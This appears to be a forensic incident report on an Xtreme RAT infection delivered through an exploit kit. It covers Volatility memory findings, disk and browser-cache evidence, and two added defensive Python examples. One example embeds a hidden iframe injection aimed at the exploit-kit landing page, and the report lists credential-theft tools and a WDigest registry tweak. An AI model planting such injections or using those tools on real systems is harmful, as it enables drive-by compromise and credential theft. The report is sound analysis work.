Overview of attack

A memory dump was taken shortly after the attack was discovered. The image was analyzed
utilizing Volatility. The following commands were run with results shown:


Suggested Profile: Win10x86_44B89EEA
DTB: 0x1a8000L
KDBG: 0x8248b000L
KPCR: 0x8248b000L

From this point, Volatility will be run specifying these parameters:

--dtb=0x1a8000 --kdbg=0x82461820 --kpcr=0x8248b000 --profile=Win10x86_44B89EEA

Yara rules from previous known compromises were collected to be run against the memory

The memory image was scanned using Volatility’s yarascan plugin with the following results:

All of the rules that were triggered were counted:

It was determined that the hits for SharedStrings and Spyeeye_plugins were likely false
positives. The hits for UPX were possibly interesting, as benign processes aren't usually UPX
packed. The hits for With_Sqlite were not definitive at this time because benign processes can
also use Sqlite. The hits for Xtreme, xtreme_rat, and xtremrat were considered interesting finds
because they are likely evidence of malware execution.

The processes in which the Xtreme RAT rules hit were also the processes in which UPX-packed
code was detected. These three processes were:

Suspected processes:

• svchost.exe (Pid: 4888)
• explorer.exe (Pid: 4872)
• update.exe (Pid: 5172)

At this point it was determined that the system was infected with Xtreme RAT malware.

A process list scan was then run on the image with Volatility:

Based on the System process start time, it was determined that the system was started at
12:54:24 on 8-16-2016 (UTC).

The process list was further refined searching for the pids of the malicious processes found in
the previous step:

Parent pid was determined for the malicious processes:

• svchost.exe (Pid: 4888) (Parent Pid: 4748)
• explorer.exe (Pid: 4872) (Parent Pid: 4748)
• update.exe (Pid: 5172) (Parent Pid: 5860)

It was determined that the malicious processes started shortly after system boot, around
13:02:57. At this point it is inconclusive if it is a fresh infection or something that was launched
by a persistence mechanism. It was further discovered that update.exe spawned several
command shells at the following times:

• 2016-08-16 13:07:36
• 2016-08-16 13:42:12
• 2016-08-16 14:08:30
• 2016-08-16 14:18:48
• 2016-08-16 14:23:02
• 2016-08-16 14:23:46

The dlllist Volatility plugin was then utilized to determine the command line which was used to
start each malicious process:

It was also determined that there were two explorer processes running on the system when
one explorer process is the norm.

Explorer.exe with PID 4872 was started using the original Windows executable, though it is not
the main explorer.exe process which was started when the user logged in (PID: 2068). This
suggests that the malware is using a RunPE technique as a form of disguise.
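The process-list refinement described above (parent PID lookup, the second explorer.exe, the shells spawned by update.exe) as an added example that is not part of the report: a small Python parser over pslist-style output. The listing is constructed, reusing the report's process names, PIDs, parent PIDs and start times; the offsets, thread/handle counts and the two cmd.exe PIDs are made up.

```python
import re
from collections import defaultdict

# Constructed pslist output in Volatility 2 layout. Names, PIDs, parent PIDs
# and start times are those given in the report; offsets, counts and the
# cmd.exe PIDs (5204, 5316) are made up. Parents 4748 and 5860 are left out
# on purpose: the report never names them, so the lookup reports them missing.
PSLIST_OUTPUT = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
0x84f6d020 System                    4      0    120      600 ------      0 2016-08-16 12:54:24 UTC+0000
0x8a1b3c40 explorer.exe           2068   2040     40     1200      1      0 2016-08-16 12:56:10 UTC+0000
0x8a2c4d60 svchost.exe            4888   4748      8      150      1      0 2016-08-16 13:02:57 UTC+0000
0x8a3d5e80 explorer.exe           4872   4748      6      110      1      0 2016-08-16 13:02:58 UTC+0000
0x8a4e6fa0 update.exe             5172   5860      5       90      1      0 2016-08-16 13:03:04 UTC+0000
0x8a5f70c0 cmd.exe                5204   5172      1       30      1      0 2016-08-16 13:07:36 UTC+0000
0x8a6081e0 cmd.exe                5316   5172      1       30      1      0 2016-08-16 13:42:12 UTC+0000
"""

# offset, name, pid, ppid, thds, hnds, sess, wow64, start timestamp
ROW = re.compile(r"^0x[0-9a-f]+\s+(\S+)\s+(\d+)\s+(\d+)\s+\d+\s+\S+\s+\S+\s+\d+\s+"
                 r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC\+0000)")

def parse_pslist(text):
    """Return one dict (name, pid, ppid, start) per data row of pslist output."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            procs.append({"name": m.group(1), "pid": int(m.group(2)),
                          "ppid": int(m.group(3)), "start": m.group(4)})
    return procs

def duplicate_singletons(procs, names=("explorer.exe",)):
    """Names expected once per session that occur more than once -> their PIDs."""
    seen = defaultdict(list)
    for p in procs:
        seen[p["name"]].append(p["pid"])
    return {n: seen[n] for n in names if len(seen[n]) > 1}

def parent_of(procs, pid):
    """(ppid, parent name) or (ppid, None) when the parent is not in the listing."""
    by_pid = {p["pid"]: p for p in procs}
    ppid = by_pid[pid]["ppid"]
    return ppid, (by_pid[ppid]["name"] if ppid in by_pid else None)

def children_of(procs, ppid):
    """(name, pid, start) of each child of ppid, ordered by start time."""
    return sorted(((p["name"], p["pid"], p["start"]) for p in procs
                   if p["ppid"] == ppid), key=lambda c: c[2])
```

A parent returned as None (as for 4748 and 5860 here) is itself a lead: the parent either exited before the dump or was not found by pslist, which is when psscan or pstree is worth running.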

The memory image was then scanned for network connections using the netscan Volatility

It was determined that some connections utilizing nonstandard TCP ports were created, along
with traffic on TCP port 80 (HTTP) and 443 (HTTPS). Remote addresses and process IDs could
not be retrieved with this scan.

Memory analysis summary

Based on basic memory analysis, the following was concluded:

• The system was most likely infected with Xtreme RAT malware, whose code was found in
the memory of at least three processes.
• The malware is possibly using a RunPE technique to hide its presence in the system.
• Some connections to unusual TCP ports were observed.
• The following path to a suspicious executable was found:
o %APPDATA%\HostData\update.exe
• The following timestamps were noted:
o 2016-08-16 13:02:57 UTC+0000 (start of svchost.exe)
o 2016-08-16 13:02:58 UTC+0000 (start of explorer.exe)
o 2016-08-16 13:03:04 UTC+0000 (start of update.exe)
o 2016-08-16 13:07:36 UTC+0000 (start of cmd.exe)
o 2016-08-16 13:42:12 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:08:30 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:18:48 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:23:02 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:23:46 UTC+0000 (start of cmd.exe)

A full forensic disk image was also taken after the memory dump. The disk image was mounted
on a forensics workstation and several searches were done:

Antivirus scan – ClamAV was run against the mounted file system to search for known malware:

• One file in the Firefox cache folder supposedly contains CVE-2012-3993 exploit code, while
another file in the INetCache folder (3568226350[1].exe) contains an executable with Xtreme
RAT. This is a pretty valuable reference as it might point to the initial attack vector.
• There is a svchost.exe executable at %TEMP%\svchost.exe likely containing a copy of
Xtreme RAT.
• Some suspicious executables are stored in the %APPDATA%\EpUpdate directory.
• The ClamAV scan confirmed that the previously found %APPDATA%\HostData\update.exe
contains code of Xtreme RAT.

The EPUpdate directory contained multiple folders and tools possibly used during the attack:

• bpd/ – BrowserPasswordDump.exe
• mmktz/ – mimikatz
• nircmd/ – NirCmd
• nmap/ – Nmap
• pwdump/ – Pwdump
• ssh/ – plink, pscp
• thc/ – THC Hydra
• passwords.txt – list of common passwords
• wdigest.reg – REG file changing the UseLogonCredential value in the WDigest registry subkey

It was further determined that at 13:10:03, suspicious executable 54948tp.exe was created at
%TEMP% path.

The web browser history was enumerated and it was determined that on the day of the
incident, 8/16/2016, the user was visiting Reddit and then entered some website at the address
http://blog.mycompany.ex/. No other websites were visited directly by the user. Moreover it
was concluded that on the day of the investigation, domain blog.mycompany.ex was resolving

Examining the Firefox browser cache determined that shortly after visiting the
blog.mycompany.ex website, multiple other files were downloaded from another domain,

The pattern of files downloaded from blog.mysportclub.ex suggests that it may be an Exploit
Kit. Further examination of blog.mycompany.ex.htm shows a strange script being called:

The script injects an iframe element pointing to
http://blog.mysportclub.ex/wpcontent/uploads/hk/task/opspy/index.php. This is a very
important observation because it tells us that the blog.mysportclub.ex website was most likely
infected with malicious code injecting an iframe element redirecting to the Exploit Kit landing page.
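An added cache-review check that is not part of the report: given a cached copy of the page (a constructed stand-in below, reusing only the two hostnames and the iframe target from the report), it lists every iframe/script/object reference whose host differs from the page's own host, including URLs written out by inline script in the document.write style, which is how the injected redirect to blog.mysportclub.ex surfaces.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the cached copy of the compromised page. The two
# hostnames and the injected iframe target are taken from the report; the
# surrounding markup is made up for this example.
CACHED_PAGE = """<html><head><title>My Company Blog</title>
<script src="/js/site.js"></script>
<script>
document.write('<iframe src="http://blog.mysportclub.ex/wpcontent/uploads/hk/task/opspy/index.php" width="1" height="1" style="visibility:hidden"></iframe>');
</script></head><body><p>Welcome</p>
<img src="http://cdn.mycompany.ex/logo.png"></body></html>"""
PAGE_HOST = "blog.mycompany.ex"

# Absolute src= URLs, including ones quoted or escaped inside a JavaScript string.
SRC_RE = re.compile(r"""src\s*=\s*\\?["']?(https?://[^"'\\\s>]+)""", re.I)

class RefCollector(HTMLParser):
    """Collects src= of iframe/script/object/embed tags plus URLs inside inline script."""
    def __init__(self):
        super().__init__()
        self.refs = []            # (origin, url)
        self._script = None       # buffer while inside <script>...</script>
    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script", "object", "embed"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append((tag, src))
        if tag == "script":
            self._script = []     # script body arrives via handle_data, not as tags
    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            for url in SRC_RE.findall("".join(self._script)):
                self.refs.append(("inline-script", url))
            self._script = None

def foreign_refs(html, page_host):
    """(origin, host, url) for every reference not served from page_host; relative URLs skipped."""
    c = RefCollector()
    c.feed(html)
    hosts = ((o, urlparse(u).hostname, u) for o, u in c.refs)
    return [(o, h, u) for o, h, u in hosts if h and h != page_host]
```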

Further evidence of multiple exploits on the website can be found in the file –
/wpcontent/uploads/hk/task/opspy/index.php file (previously saved to blog.mysportclub.ex as

It contains multiple